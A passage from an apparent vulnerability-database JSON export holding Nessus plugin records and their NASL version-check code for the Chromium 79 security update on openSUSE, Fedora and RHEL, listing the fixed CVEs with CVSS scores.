thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'79.0.3945.79', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:05", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to 79.0.3945.79 (boo#1158982)	 \n\n - CVE-2019-13725: Fixed a use after free in Bluetooth\n\n - CVE-2019-13726: Fixed a heap buffer overflow in password manager\n\n - CVE-2019-13727: Fixed an insufficient policy enforcement in WebSockets\n\n - CVE-2019-13728: Fixed an out of bounds write in V8\n\n - CVE-2019-13729: Fixed a use after free in WebSockets\n\n - CVE-2019-13730: Fixed a type Confusion in V8\n\n - CVE-2019-13732: Fixed a use after free in WebAudio\n\n - CVE-2019-13734: Fixed an out of bounds write in SQLite\n\n - CVE-2019-13735: Fixed an out of bounds write in V8\n\n - CVE-2019-13764: Fixed a type Confusion in V8\n\n - CVE-2019-13736: Fixed an integer overflow in PDFium\n\n - CVE-2019-13737: Fixed an insufficient policy enforcement in autocomplete\n\n - CVE-2019-13738: Fixed an insufficient policy enforcement in navigation\n\n - CVE-2019-13739: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13740: Fixed an incorrect security UI in sharing\n\n - CVE-2019-13741: Fixed an insufficient validation of untrusted input in Blink\n\n - CVE-2019-13742: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13743: Fixed an incorrect security UI in external protocol handling\n\n - CVE-2019-13744: Fixed an insufficient policy enforcement in cookies\n\n - CVE-2019-13745: Fixed an insufficient policy enforcement in audio\n\n - CVE-2019-13746: Fixed an insufficient policy enforcement in Omnibox\n\n - CVE-2019-13747: Fixed an uninitialized Use in rendering\n\n - CVE-2019-13748: Fixed an insufficient policy enforcement in developer tools\n\n - CVE-2019-13749: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13750: Fixed an insufficient data validation in SQLite\n\n - CVE-2019-13751: Fixed an uninitialized Use in SQLite\n\n - CVE-2019-13752: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13753: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13754: Fixed an insufficient policy enforcement in extensions\n\n - CVE-2019-13755: Fixed an insufficient policy enforcement in extensions\n\n - CVE-2019-13756: Fixed an incorrect security UI in printing\n\n - CVE-2019-13757: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13758: Fixed an insufficient policy enforcement in navigation\n\n - CVE-2019-13759: Fixed an incorrect security UI in interstitials\n\n - CVE-2019-13761: Fixed an incorrect security UI in Omnibox\n\n - CVE-2019-13762: Fixed an insufficient policy enforcement in downloads\n\n - CVE-2019-13763: Fixed an insufficient policy enforcement in payments", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2019-2692)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2692.NASL", "href": "https://www.tenable.com/plugins/nessus/132087", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2692.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132087);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-2692)\");\n script_summary(english:\"Check for the openSUSE-2019-2692 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to 79.0.3945.79 (boo#1158982)	 \n\n - CVE-2019-13725: Fixed a use after free in Bluetooth\n\n - CVE-2019-13726: Fixed a heap buffer overflow in password\n manager\n\n - CVE-2019-13727: Fixed an insufficient policy enforcement\n in WebSockets\n\n - CVE-2019-13728: Fixed an out of bounds write in V8\n\n - CVE-2019-13729: Fixed a use after free in WebSockets\n\n - CVE-2019-13730: Fixed a type Confusion in V8\n\n - CVE-2019-13732: Fixed a use after free in WebAudio\n\n - CVE-2019-13734: Fixed an out of bounds write in SQLite\n\n - CVE-2019-13735: Fixed an out of bounds write in V8\n\n - CVE-2019-13764: Fixed a type Confusion in V8\n\n - CVE-2019-13736: Fixed an integer overflow in PDFium\n\n - CVE-2019-13737: Fixed an insufficient policy enforcement\n in autocomplete\n\n - CVE-2019-13738: Fixed an insufficient policy enforcement\n in navigation\n\n - CVE-2019-13739: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13740: Fixed an incorrect security UI in\n sharing\n\n - CVE-2019-13741: Fixed an insufficient validation of\n untrusted input in Blink\n\n - CVE-2019-13742: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13743: Fixed an incorrect security UI in\n external protocol handling\n\n - CVE-2019-13744: Fixed an insufficient policy enforcement\n in cookies\n\n - CVE-2019-13745: Fixed an insufficient policy enforcement\n in audio\n\n - CVE-2019-13746: Fixed an insufficient policy enforcement\n in Omnibox\n\n - CVE-2019-13747: Fixed an uninitialized Use in rendering\n\n - CVE-2019-13748: Fixed an insufficient policy enforcement\n in developer tools\n\n - CVE-2019-13749: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13750: Fixed an insufficient data validation in\n SQLite\n\n - CVE-2019-13751: Fixed an uninitialized Use in SQLite\n\n - CVE-2019-13752: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13753: Fixed an out of bounds read in SQLite\n\n - CVE-2019-13754: Fixed an insufficient policy enforcement\n in extensions\n\n - CVE-2019-13755: Fixed an insufficient policy enforcement\n in extensions\n\n - CVE-2019-13756: Fixed an incorrect security UI in\n printing\n\n - CVE-2019-13757: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13758: Fixed an insufficient policy enforcement\n in navigation\n\n - CVE-2019-13759: Fixed an incorrect security UI in\n interstitials\n\n - CVE-2019-13761: Fixed an incorrect security UI in\n Omnibox\n\n - CVE-2019-13762: Fixed an insufficient policy enforcement\n in downloads\n\n - CVE-2019-13763: Fixed an insufficient policy enforcement\n in payments\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1158982\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-79.0.3945.79-lp151.2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-79.0.3945.79-lp151.2.51.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-79.0.3945.79-lp151.2.51.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-79.0.3945.79-lp151.2.51.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-79.0.3945.79-lp151.2.51.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:12", "description": "Update to Chromium 79. Fixes the usual giant pile of bugs and security issues. This time, the list is :\n\nCVE-2019-13725 CVE-2019-13726 CVE-2019-13727 CVE-2019-13728 CVE-2019-13729 CVE-2019-13730 CVE-2019-13732 CVE-2019-13734 CVE-2019-13735 CVE-2019-13764 CVE-2019-13736 CVE-2019-13737 CVE-2019-13738 CVE-2019-13739 CVE-2019-13740 CVE-2019-13741 CVE-2019-13742 CVE-2019-13743 CVE-2019-13744 CVE-2019-13745 CVE-2019-13746 CVE-2019-13747 CVE-2019-13748 CVE-2019-13749 CVE-2019-13750 CVE-2019-13751 CVE-2019-13752 CVE-2019-13753 CVE-2019-13754 CVE-2019-13755 CVE-2019-13756 CVE-2019-13757 CVE-2019-13758 CVE-2019-13759 CVE-2019-13761 CVE-2019-13762 CVE-2019-13763\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2019-1a10c04281)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-1A10C04281.NASL", "href": "https://www.tenable.com/plugins/nessus/132111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-1a10c04281.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132111);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\");\n script_xref(name:\"FEDORA\", value:\"2019-1a10c04281\");\n\n script_name(english:\"Fedora 31 : chromium (2019-1a10c04281)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to Chromium 79. Fixes the usual giant pile of bugs and security\nissues. This time, the list is :\n\nCVE-2019-13725 CVE-2019-13726 CVE-2019-13727 CVE-2019-13728\nCVE-2019-13729 CVE-2019-13730 CVE-2019-13732 CVE-2019-13734\nCVE-2019-13735 CVE-2019-13764 CVE-2019-13736 CVE-2019-13737\nCVE-2019-13738 CVE-2019-13739 CVE-2019-13740 CVE-2019-13741\nCVE-2019-13742 CVE-2019-13743 CVE-2019-13744 CVE-2019-13745\nCVE-2019-13746 CVE-2019-13747 CVE-2019-13748 CVE-2019-13749\nCVE-2019-13750 CVE-2019-13751 CVE-2019-13752 CVE-2019-13753\nCVE-2019-13754 CVE-2019-13755 CVE-2019-13756 CVE-2019-13757\nCVE-2019-13758 CVE-2019-13759 CVE-2019-13761 CVE-2019-13762\nCVE-2019-13763\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-1a10c04281\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-79.0.3945.79-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:08", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 79.0.3945.79.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use after free in Bluetooth (CVE-2019-13725)\n\n* chromium-browser: Heap buffer overflow in password manager (CVE-2019-13726)\n\n* chromium-browser: Insufficient policy enforcement in WebSockets (CVE-2019-13727)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2019-13728)\n\n* chromium-browser: Use after free in WebSockets (CVE-2019-13729)\n\n* chromium-browser: Type Confusion in V8 (CVE-2019-13730)\n\n* chromium-browser: Use after free in WebAudio (CVE-2019-13732)\n\n* chromium-browser: Out of bounds write in SQLite (CVE-2019-13734)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2019-13735)\n\n* chromium-browser: Type Confusion in V8 (CVE-2019-13764)\n\n* chromium-browser: Integer overflow in PDFium (CVE-2019-13736)\n\n* chromium-browser: Insufficient policy enforcement in autocomplete (CVE-2019-13737)\n\n* chromium-browser: Insufficient policy enforcement in navigation (CVE-2019-13738)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13739)\n\n* chromium-browser: Incorrect security UI in sharing (CVE-2019-13740)\n\n* chromium-browser: Insufficient validation of untrusted input in Blink (CVE-2019-13741)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13742)\n\n* chromium-browser: Incorrect security UI in external protocol handling (CVE-2019-13743)\n\n* chromium-browser: Insufficient policy enforcement in cookies (CVE-2019-13744)\n\n* chromium-browser: Insufficient policy enforcement in audio (CVE-2019-13745)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox (CVE-2019-13746)\n\n* chromium-browser: Uninitialized Use in rendering (CVE-2019-13747)\n\n* chromium-browser: Insufficient policy enforcement in developer tools (CVE-2019-13748)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13749)\n\n* chromium-browser: Insufficient data validation in SQLite (CVE-2019-13750)\n\n* chromium-browser: Uninitialized Use in SQLite (CVE-2019-13751)\n\n* chromium-browser: Out of bounds read in SQLite (CVE-2019-13752)\n\n* chromium-browser: Out of bounds read in SQLite (CVE-2019-13753)\n\n* chromium-browser: Insufficient policy enforcement in extensions (CVE-2019-13754)\n\n* chromium-browser: Insufficient policy enforcement in extensions (CVE-2019-13755)\n\n* chromium-browser: Incorrect security UI in printing (CVE-2019-13756)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13757)\n\n* chromium-browser: Insufficient policy enforcement in navigation (CVE-2019-13758)\n\n* chromium-browser: Incorrect security UI in interstitials (CVE-2019-13759)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13761)\n\n* chromium-browser: Insufficient policy enforcement in downloads (CVE-2019-13762)\n\n* chromium-browser: Insufficient policy enforcement in payments (CVE-2019-13763)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2019:4238)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-4238.NASL", "href": "https://www.tenable.com/plugins/nessus/132228", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:4238. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132228);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", 